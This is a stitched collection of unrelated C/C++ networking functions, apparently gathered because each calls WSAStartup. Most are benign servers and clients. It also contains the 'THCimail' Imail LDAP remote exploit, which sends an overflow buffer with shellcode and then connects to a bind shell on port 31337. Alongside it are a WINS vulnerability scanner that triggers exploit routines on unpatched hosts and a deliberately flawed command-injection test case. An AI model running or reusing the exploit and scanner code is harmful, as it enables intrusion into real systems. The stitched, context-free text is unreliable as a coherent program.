int main() { /*int c = 0; std::thread t(shit, 2, 3, std::ref(c)); std::cout << c << std::endl; sc::Library lib("core.dll"); modfunc f = (modfunc)lib.GetSymbol("initMod"); f();*/ //std::string hash = sha1::hash("x3JJHMbDL1EzLkh9GBhXDw==258EAFA5-E914-47DA-95CA-C5AB0DC85B11"); //std::string str = sc::str::tolower("x3JJHMbDL1 € EzLkh9GBh¢XDw=="); //auto ef = sc::str::split("fu\nck", '\n'); //std::cout << calculateConnectionHash(str); //std::cout << base64_decode("HSmrc0sMlYUkAGmm5OPpG2HaGWk="); #ifdef _WIN32 SetConsoleCtrlHandler((PHANDLER_ROUTINE)&ctrlHandler, TRUE); WSADATA wdata; if(WSAStartup(MAKEWORD(2, 2), &wdata) != 0) return false; #else signal(SIGINT, sigHandler); signal(SIGTERM, sigHandler); signal(SIGABRT, sigHandler); #endif auto req = sc::HTTPRequest::Get("http://chat.flashii.net/", { {"view", "auth"}, {"arg1", "303"}, {"arg2", "2ef2094972cc00f0860cd85e96a243eaac67497d"} }); std::cout << req.content; //auto req = sc::HTTPRequest::Get("http://aroltd.com/"); //std::string wowo = sc::net::packTime(); sc::INI test; try { test = sc::INI("c_config.ini", { {"socket", { {"client_root", sc::INI::STRING}, {"port", sc::INI::INTEGER} }}, {"structure", { {"backlog_length", sc::INI::INTEGER}, {"default_channel", sc::INI::STRING} }}, {"limits", { {"max_conns_per_ip", sc::INI::INTEGER}, {"max_channel_depth", sc::INI::INTEGER}, {"max_channel_name_length", sc::INI::INTEGER}, {"max_username_length", sc::INI::INTEGER}, {"max_message_length", sc::INI::INTEGER}, {"max_idle_time", sc::INI::INTEGER} }} }); } catch(std::exception &e) { std::cout << e.what() << std::endl; return -1; } std::string a = test["socket"]["port"]; sc::Socket client; if(!sock.Init(6770)) { std::cout << "Could not open socket on port 6770! Error: " << std::endl; return -1; } sock.SetBlocking(false); int status; auto conns = std::map<std::string, ThreadContext*>(); while(true) { if((status = sock.Accept(client)) == 0) { if(conns.count(client.GetIPAddress()) == 0) { auto tmp = new ThreadContext(new sc::Socket(client)); conns[client.GetIPAddress()] = tmp; std::thread(connectionThread, tmp).detach(); } else conns[client.GetIPAddress()]->PushSocket(new sc::Socket(client)); } else if(status == -1) break; for(auto i = conns.begin(); i != conns.end(); ) { if(i->second->IsDone()) { delete i->second; i = conns.erase(i); } else ++i; } } sock.Close(); #ifdef _WIN32 WSACleanup(); #endif return 0; }
void CWE78_OS_Command_Injection__char_listen_socket_execlp_65_bad() { char * data; /* define a function pointer */ void (*funcPtr) (char *) = CWE78_OS_Command_Injection__char_listen_socket_execlp_65b_badSink; char dataBuffer[100] = ""; data = dataBuffer; { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; char *replace; SOCKET listenSocket = INVALID_SOCKET; SOCKET acceptSocket = INVALID_SOCKET; size_t dataLen = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a listen socket */ listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listenSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; service.sin_port = htons(TCP_PORT); if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR) { break; } acceptSocket = accept(listenSocket, NULL, NULL); if (acceptSocket == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed */ recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* Append null terminator */ data[dataLen + recvResult / sizeof(char)] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) { *replace = '\0'; } replace = strchr(data, '\n'); if (replace) { *replace = '\0'; } } while (0); if (listenSocket != INVALID_SOCKET) { CLOSE_SOCKET(listenSocket); } if (acceptSocket != INVALID_SOCKET) { CLOSE_SOCKET(acceptSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } /* use the function pointer */ funcPtr(data); }
UINT engine2(LPVOID tip) { int ip=int(tip); #ifdef WIN32 WSADATA wsadata; if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");mthread--;return -1;} #endif SOCKET s;fd_set mask;struct timeval timeout, timeout2; struct sockaddr_in server; s=socket(AF_INET,SOCK_STREAM,0); if (s==-1){se++;mthread--; #ifdef WIN32 return -1; #else return engine; #endif } server.sin_family=AF_INET; server.sin_addr.s_addr=htonl(ip); server.sin_port=htons(42); if (scanend<=scan+1){printf("[+] status..: %d%s thread(s):%d \r",(scanend)*100/(scan),pcent,mthread);} unsigned long flag=1; if (ioctlsocket(s,FIONBIO,&flag)!=0) { se++;mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } connect(s,( struct sockaddr *)&server,sizeof(server)); timeout.tv_sec=3;timeout.tv_usec=0;timeout2.tv_sec=5;timeout2.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask); switch(select(s+1,NULL,&mask,NULL,&timeout)) { case -1: {mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } case 0: {mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } default: if(FD_ISSET(s,&mask)) { ok2++; if (send(s,data,sizeof(data)-1,0)==-1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: error sending, not wins\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: error sending, not wins \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));} mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } sl(3); switch(select(s+1,&mask,NULL,NULL,&timeout2)) { case -1: {mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } case 0: {fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: nothing received, not wins or vulnerable service freezing\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: nothing received, not wins or vulnerable service freezing\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));} mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } default: rc = recv(s,recvbuf,sizeof(recvbuf),0); } if (rc<40||recvbuf[3]!=41&&recvbuf[8]!=88){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: not wins, wrong datas\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: not wins, wrong datas \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));} mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } ok3++; if (recvbuf[24]==-144&&recvbuf[25]==-107){spb=0;} else if (recvbuf[24]==40&&recvbuf[25]==-5){spb=1;} if (recvbuf[36]==37&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: NOT_PATCHED\nOS.............: Windows 2003 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: NOT_PATCHED \nOS.............: Windows 2003 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);} ok++;k3++;tot++;if (bose==1){scr1(server);}mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } else if (recvbuf[36]==53&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2003 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);fflush(fplog); if (recvbuf[24]==-144&&recvbuf[25]==-107){spb=0;} else if (recvbuf[24]==40&&recvbuf[25]==-5){spb=1;} if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2003 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),spb);} k3++;mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } else if (recvbuf[36]==71&&recvbuf[39]==1){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2003 SP1\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2003 SP1 \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));} k3++;mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } else if (recvbuf[36]==85&&recvbuf[37]==31&&recvbuf[40]==24&&recvbuf[41]==37|| recvbuf[36]==-111&&recvbuf[37]==-127&&recvbuf[40]==64&&recvbuf[41]==-106|| recvbuf[36]==-107&&recvbuf[37]==43&&recvbuf[40]==8&&recvbuf[41]==54|| recvbuf[36]==-89&&recvbuf[37]==-99&&recvbuf[40]==-128&&recvbuf[41]==38|| recvbuf[36]==69&&recvbuf[37]==-112&&recvbuf[40]==-144&&recvbuf[41]==31|| recvbuf[36]==-37&&recvbuf[37]==-128&&recvbuf[40]==-136&&recvbuf[41]==-82){ if (recvbuf[36]==85&&recvbuf[37]==31&&recvbuf[40]==24&&recvbuf[41]==37||recvbuf[36]==-111&&recvbuf[37]==-127&&recvbuf[40]==64&&recvbuf[41]==-106){sp=4;} else if (recvbuf[36]==-107&&recvbuf[37]==43&&recvbuf[40]==8&&recvbuf[41]==54){sp=3;} else if (recvbuf[36]==-89&&recvbuf[37]==-99&&recvbuf[40]==-128&&recvbuf[41]==38){sp=2;} else if (recvbuf[36]==69&&recvbuf[37]==-112&&recvbuf[40]==-144&&recvbuf[41]==31){sp=1;} else if (recvbuf[36]==-37&&recvbuf[37]==-128&&recvbuf[40]==-136&&recvbuf[41]==-82){sp=0;} if (recvbuf[16]==0&&recvbuf[17]==0&&recvbuf[18]==0){fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: patched\nOS.............: Windows 2000 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: patched \nOS.............: Windows 2000 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);} k0++;mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } else {fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: NOT_PATCHED\nOS.............: Windows 2000 SP%d\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: NOT_PATCHED \nOS.............: Windows 2000 SP%d \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port),sp);} ok++;k0++;tot++;if (bose==1){scr2(server);}mthread--;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } } else { fprintf(fplog,"IP.............: %s:%d\nSTATUS.........: wins enabled\nVULNERABILITY..: unknown\nOS.............: NT4 (OS not implemented)\n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));fflush(fplog); if (bose2==1){printf("IP.............: %s:%d \nSTATUS.........: wins enabled \nVULNERABILITY..: unknown \nOS.............: NT4 (OS not implemented) \n\n",inet_ntoa(server.sin_addr),ntohs(server.sin_port));} t4++;mthread--;tot++;closesocket(s); #ifdef WIN32 return -1; #else return engine; #endif } } } mthread--; closesocket(s); #ifdef WIN32 return 0; #else return engine; #endif }
SocketInitializer() { WSADATA init; WSAStartup(MAKEWORD(2, 2), &init); }
void CSynForcePadDlg::EviaDadosViaSocket(ULONG ul, LONG lX, LONG lY, LONG lZ, long lForce, int evento) { // evento = 1 -> TOUCH_DOWN // evento = 2 -> TOUCH_MOVE // evento = 3 -> TOUCH_UP // Aqui coloco as definições do SOCKET int wsaret=WSAStartup(0x101,&wsaData); if(wsaret) return; conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(conn==INVALID_SOCKET) return; int porta = 123; sprintf(ServerNameInChar,"127.0.0.1"); if(inet_addr((char*) ServerNameInChar)==INADDR_NONE) { hp=gethostbyname(ServerNameInChar); } else { addr=inet_addr(ServerNameInChar); hp=gethostbyaddr((char*)&addr,sizeof(addr),AF_INET); } if(hp==NULL) { closesocket(conn); return; } server.sin_addr.s_addr=*((unsigned long*)hp->h_addr); server.sin_family=AF_INET; server.sin_port=htons(porta); if(connect(conn,(struct sockaddr*)&server,sizeof(server))) { closesocket(conn); return; } // Fim da inicialização do socket // SEQUENCIA DE DADOS: Finger %d, XRaw %d, YRaw %d, ZRaw %d, Force %d, evento // sprintf(buff,"Ola DADOS: Finger %d, XRaw %d, YRaw %d, ZRaw %d, Force %d",ul, lX, lY, lZ, lForce); // sprintf(buff,"Ola DADOS: Finger %d, X %d, Y %d, Z %d, F %d, E %d",ul, lX, lY, lZ, lForce, evento); sprintf(buff,"Ola %d,%d,%d,%d,%d,%d",ul, lX, lY, lZ, lForce, evento); send(conn,buff,strlen(buff),0); // Finalizações do socket closesocket(conn); WSACleanup(); }
int main(int argc, char **argv) { WSADATA wsa_data; SOCKET listening_socket = INVALID_SOCKET, client_socket = INVALID_SOCKET; struct addrinfo *result = NULL, hints; struct sockaddr address; int return_code, index, address_length, shutdown_signal = 0; char control_message[MAX_INPUT_LENGTH]; HTHREAD threads[MAX_CONNECTIONS]; init_crc(); printf("UFTP Daemon v0.8\n"); printf("--------------------------\n\n"); printf("On fixed port: %s\n", CONNECT_PORT); printf("Max. Connurent Connections: %d\n", MAX_CONNECTIONS); printf("\nServer staring up."); // Clean up thread lookup memset(threads, 0, sizeof(HTHREAD) * MAX_CONNECTIONS); printf("."); // Initialize Winsock sub-system return_code = WSAStartup(MAKEWORD(2,2), &wsa_data); if(return_code != 0) { printf("WSAStartup failed: %d\n", return_code); return 1; } printf("."); // Resolve the server address and port memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; hints.ai_flags = AI_PASSIVE; return_code = getaddrinfo(NULL, CONNECT_PORT, &hints, &result); if(return_code != 0) { printf("getaddrinfo failed: %d\n", return_code); WSACleanup(); return 1; } printf("."); // Create a SOCKET for connecting to server listening_socket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); if(listening_socket == INVALID_SOCKET) { printf("socket failed: %ld\n", WSAGetLastError()); freeaddrinfo(result); WSACleanup(); return 1; } printf("."); // Setup the TCP listening socket return_code = bind(listening_socket, result->ai_addr, (int)result->ai_addrlen); if(return_code == SOCKET_ERROR) { printf("bind failed: %d\n", WSAGetLastError()); freeaddrinfo(result); closesocket(listening_socket); WSACleanup(); return 1; } freeaddrinfo(result); printf("."); return_code = listen(listening_socket, SOMAXCONN); if(return_code == SOCKET_ERROR) { printf("listen failed: %d\n", WSAGetLastError()); closesocket(listening_socket); WSACleanup(); return 1; } printf(".DONE!\n\n"); // Loop until shutdown while(!shutdown_signal) { // Accept a client socket memset(&address, 0, sizeof(address)); client_socket = INVALID_SOCKET; address_length = sizeof(address); client_socket = accept(listening_socket, &address, &address_length); if(client_socket == INVALID_SOCKET) printf("accept failed: %d\n", WSAGetLastError()); memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); return_code = recv(client_socket, control_message, MAX_INPUT_LENGTH-1, 0); if(control_message[0] != CONTROL_MESSAGE_SEND_HELLO) { return_code = shutdown(client_socket, SD_BOTH); closesocket(client_socket); continue; } // Client socket valid start tread to handle client index = find_next_free_thread(threads); if(index == -1) { printf("max connections reached: %d\n", MAX_CONNECTIONS); memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); control_message[0] = CONTROL_MESSAGE_SERVER_BUSY; return_code = send(client_socket, control_message, (int)strlen(control_message), 0); return_code = shutdown(client_socket, SD_BOTH); closesocket(client_socket); continue; } threads[index].in_use = 1; threads[index].socket = client_socket; memcpy(&threads[index].address, &address, sizeof(address)); threads[index].handle = CreateThread(NULL, 0, handle_client_thread, &threads[index], 0, &threads[index].id); if(threads[index].handle == NULL) printf("unable to create thread: %d\n", index); // TODO: Add clean way to close down server //if(tolower(getchar()) == (int)'q') // shutdown_signal = 1; } // Close to stop new connections closesocket(listening_socket); // Make sure all threads are complete and exited for(index = 0; index < MAX_CONNECTIONS; index++) { WaitForSingleObject(threads[index].handle, INFINITE); CloseHandle(threads[index].handle); } // Close down socket sub-system WSACleanup(); return 0; }
int main(int argc, char *argv[]) { const char *hostname = "127.0.0.1"; const char *commandline = "uptime"; const char *username = "******"; const char *password = "******"; unsigned long hostaddr; int sock; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; LIBSSH2_KNOWNHOSTS *nh; int type; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(2,0), &wsadata); #endif if (argc > 1) /* must be ip address only */ hostname = argv[1]; if (argc > 2) { username = argv[2]; } if (argc > 3) { password = argv[3]; } if (argc > 4) { commandline = argv[4]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); /* Ultra basic "connect to port 22 on localhost" * Your code is responsible for creating the socket establishing the * connection */ sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } /* Create a session instance */ session = libssh2_session_init(); if (!session) return -1; /* tell libssh2 we want it all done non-blocking */ libssh2_session_set_blocking(session, 0); /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Failure establishing SSH session: %d\n", rc); return -1; } nh = libssh2_knownhost_init(session); if(!nh) { /* eeek, do cleanup here */ return 2; } /* read all hosts from here */ libssh2_knownhost_readfile(nh, "known_hosts", LIBSSH2_KNOWNHOST_FILE_OPENSSH); /* store all known hosts to here */ libssh2_knownhost_writefile(nh, "dumpfile", LIBSSH2_KNOWNHOST_FILE_OPENSSH); fingerprint = libssh2_session_hostkey(session, &len, &type); if(fingerprint) { struct libssh2_knownhost *host; #if LIBSSH2_VERSION_NUM >= 0x010206 /* introduced in 1.2.6 */ int check = libssh2_knownhost_checkp(nh, hostname, 22, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN| LIBSSH2_KNOWNHOST_KEYENC_RAW, &host); #else /* 1.2.5 or older */ int check = libssh2_knownhost_check(nh, hostname, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN| LIBSSH2_KNOWNHOST_KEYENC_RAW, &host); #endif fprintf(stderr, "Host check: %d, key: %s\n", check, (check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH)? host->key:"<none>"); /***** * At this point, we could verify that 'check' tells us the key is * fine or bail out. *****/ } else { /* eeek, do cleanup here */ return 3; } libssh2_knownhost_free(nh); if ( strlen(password) != 0 ) { /* We could authenticate via password */ while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Authentication by password failed.\n"); goto shutdown; } } else { /* Or by public key */ while ((rc = libssh2_userauth_publickey_fromfile(session, username, "/home/user/" ".ssh/id_rsa.pub", "/home/user/" ".ssh/id_rsa", password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "\tAuthentication by public key failed\n"); goto shutdown; } } #if 0 libssh2_trace(session, ~0 ); #endif /* Exec non-blocking on the remove host */ while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { fprintf(stderr,"Error\n"); exit( 1 ); } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { fprintf(stderr,"Error\n"); exit( 1 ); } for( ;; ) { /* loop until we block */ int rc; do { char buffer[0x4000]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; fprintf(stderr, "We read:\n"); for( i=0; i < rc; ++i ) fputc( buffer[i], stderr); fprintf(stderr, "\n"); } else { if( rc != LIBSSH2_ERROR_EAGAIN ) /* no need to output this for the EAGAIN case */ fprintf(stderr, "libssh2_channel_read returned %d\n", rc); } } while( rc > 0 ); /* this is due to blocking that would occur otherwise so we loop on this condition */ if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) fprintf(stderr, "\nGot signal: %s\n", exitsignal); else fprintf(stderr, "\nEXIT: %d bytecount: %d\n", exitcode, bytecount); libssh2_channel_free(channel); channel = NULL; shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif fprintf(stderr, "all done\n"); libssh2_exit(); return 0; }
int main(int argc, char** argv) { WSADATA w; unsigned short PORT = 53; int CLIENT_LENGTH; int BYTES_RECVD; SOCKET sd; struct sockaddr_in SERVER, CLIENT; char BUFFER[4096]; memset((void*)&SERVER, '\0', sizeof(struct sockaddr_in)); SERVER.sin_family = AF_INET; SERVER.sin_port = htons(PORT); // Open winsock if(WSAStartup(0x0101, &w) != 0) { fprintf(stderr, "Could not get winsock\n"); exit(0); } sd = socket(AF_INET, SOCK_DGRAM, 0); if(sd == INVALID_SOCKET) { fprintf(stderr, "Could not create socket\n"); WSACleanup(); exit(0); } strtosockaddr_in("0.0.0.0", &SERVER); if(bind(sd, (struct sockaddr*)&SERVER, sizeof(struct sockaddr_in)) == -1) { fprintf(stderr, "Could not bind to socket\n"); closesocket(sd); WSACleanup(); exit(0); } printf("Server running on %u.%u.%u.%u\n", (unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b1, (unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b2, (unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b3, (unsigned char)SERVER.sin_addr.S_un.S_un_b.s_b4); printf("Press CTRL + C to quit\n"); while(1) { CLIENT_LENGTH = (int)sizeof(struct sockaddr_in); BYTES_RECVD = recvfrom(sd, BUFFER, 4096, 0, (struct sockaddr*)&CLIENT, &CLIENT_LENGTH); if(BYTES_RECVD < 0) { fprintf(stderr, "Could not recieve datagram\n"); closesocket(sd); WSACleanup(); exit(0); } QUESTION* qq = parse_question(BUFFER, BYTES_RECVD); char *connected_ip = inet_ntoa(CLIENT.sin_addr); printf("QUERY TYPE:%d from %s:%d is %s\n", qq->TYPE, connected_ip, CLIENT.sin_port, qq->QUERY); } closesocket(sd); WSACleanup(); return 0; }
void main() { //初始化SOCKET必须调用 WSAData wsd; WSAStartup(MAKEWORD(2, 0), &wsd); printf("为确保程序正常运行,请先启动服务端\n"); printf("请输入你想连接的地址,按回车会默认使用本机地址\n"); char i_address[16]; gets(i_address); if (i_address[0] == '\0') { strcpy(i_address, "127.0.0.1"); } printf("准备与服务器 %s 建立连接 端口:%d\n", i_address, PORT); //创建SOCKET SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (s == INVALID_SOCKET) { printf("socket 创建失败,错误代码:%d\n", WSAGetLastError()); exit(0); } //定义 socket 地址 初始化清空 struct sockaddr_in channel; memset(&channel, 0, sizeof(channel)); channel.sin_family = AF_INET; channel.sin_addr.s_addr = inet_addr(i_address); channel.sin_port = htons(PORT); //绑定地址以及端口 int c = connect(s, (struct sockaddr *) &channel, sizeof(channel)); if (c == SOCKET_ERROR) { printf("连接出错 失败, 错误代码:%d\n", WSAGetLastError()); exit(0); } //初始化工作完成 printf("TCP连接已建立 ,准备向主机 %s:%d 发送信息\n ", i_address, PORT); //定义缓冲区 char buf[BUF_SIZE]; char info[256]; char quitInfo[] = "QUIT"; int nBytesSend = strlen(buf); do { gets(info); if (info[0] == '\0') { printf("没有检测到内容,请重新输入\n"); } else { if (!strcmp(info, quitInfo)) { printf("检测到退出命令\n"); break; } strcpy(buf, info); nBytesSend = send(s, buf, strlen(buf), 0); } } while (nBytesSend == strlen(buf)); printf("即将关闭连接\n"); int r = closesocket(s); if (r == SOCKET_ERROR) { printf("关闭失败\n"); exit(0); } printf("输入结束 与服务器连接断开,按任意键结束\n"); getch(); }
int main(int argc, char *argv[]) { unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER; unsigned char *finalbuffer,*crapbuf1,*crapbuf2; unsigned int IMAIL6_7=60; unsigned int IMAIL_8=68; struct sockaddr_in mytcp; struct hostent * hp; WSADATA wsaData; printf("\nTHCimail v0.1 - Imail LDAP exploit\n"); printf("tested on Imail 6-8\n"); printf("by Johnny Cyberpunk ([email protected])\n"); if(argc<4 || argc>4) usage(); ver = (unsigned short)atoi(argv[3]); switch(ver) { case 0: IMAILVER = IMAIL6_7; break; case 1: IMAILVER = IMAIL_8; break; default: printf("\nYou entered an illegal version !\n\n"); usage(); exit(-1); } crapbuf1 = malloc(IMAILVER); memset(crapbuf1,'X',IMAILVER); printf("imailver = %d\n",IMAILVER); crapbuf2 = malloc(2220); memset(crapbuf2,'X',2220); finalbuffer = malloc(2650); memset(finalbuffer,0,2650); printf("\n[*] building buffer\n"); strcat(finalbuffer,ldapshit); strcat(finalbuffer,crapbuf1); strcat(finalbuffer,jumper); os = (unsigned short)atoi(argv[2]); switch(os) { case 0: strcat(finalbuffer,WIN2KPG); break; case 1: strcat(finalbuffer,WIN2KPG); break; case 2: strcat(finalbuffer,WINXPSP1G); break; default: printf("\nYou entered an illegal OS !\n\n"); usage(); exit(-1); } strcat(finalbuffer,shellcode); strcat(finalbuffer,crapbuf2); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0) { printf("WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ) { printf("Unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock) { printf("socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length); else mytcp.sin_addr.s_addr = addr; if (hp) mytcp.sin_family = hp->h_addrtype; else mytcp.sin_family = AF_INET; mytcp.sin_port=htons(389); printf("[*] connecting the target\n"); rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,finalbuffer,2650,0); printf("[*] Exploit send successfully ! Sleeping a while ....\n"); Sleep(1000); } else printf("\nCan't connect to ldap port!\n"); if(rc==0) { printf("[*] Trying to get a shell\n\n"); sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); mytcp.sin_port = htons(31337); rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp)); if(rc!=0) { printf("can't connect to port 31337 ;( maybe firewalled ...\n"); exit(-1); } shell(sock2); } shutdown(sock,1); closesocket(sock); free(crapbuf1); free(crapbuf2); free(finalbuffer); exit(0); }
/** * Initilises the listening socket * @param udp_port the UDP listening port */ bool vrpn_Tracker_JsonNet::_network_init(int udp_port) { int iResult; #ifdef _WIN32 { // Initialize Winsock WORD versionRequested = MAKEWORD(2,2); WSADATA wsaData; iResult = WSAStartup(versionRequested, &wsaData); if (iResult != 0) { printf("WSAStartup failed with error: %d\n", iResult); return false; } } #endif #ifdef _WIN32 { // Create a SOCKET for connecting to server _socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (_socket == INVALID_SOCKET) { printf("socket failed with error: %ld\n", WSAGetLastError()); //freeaddrinfo(result); WSACleanup(); return false; } } #else { int usock; usock = socket(PF_INET, SOCK_DGRAM, 0); if (usock < 0){ return false; } _socket = usock; } #endif struct sockaddr_in localSocketAddress; localSocketAddress.sin_family = AF_INET; localSocketAddress.sin_addr.s_addr = htonl(INADDR_ANY); localSocketAddress.sin_port = htons(udp_port); // Setup the listening socket iResult = bind( _socket, (struct sockaddr*)&localSocketAddress, sizeof(localSocketAddress)); if (iResult < 0) { #ifdef _WIN32 printf("bind failed with error: %d\n", WSAGetLastError()); #else printf("bind failed."); #endif //freeaddrinfo(result); _network_release(); return false; } //freeaddrinfo(result); return true; }
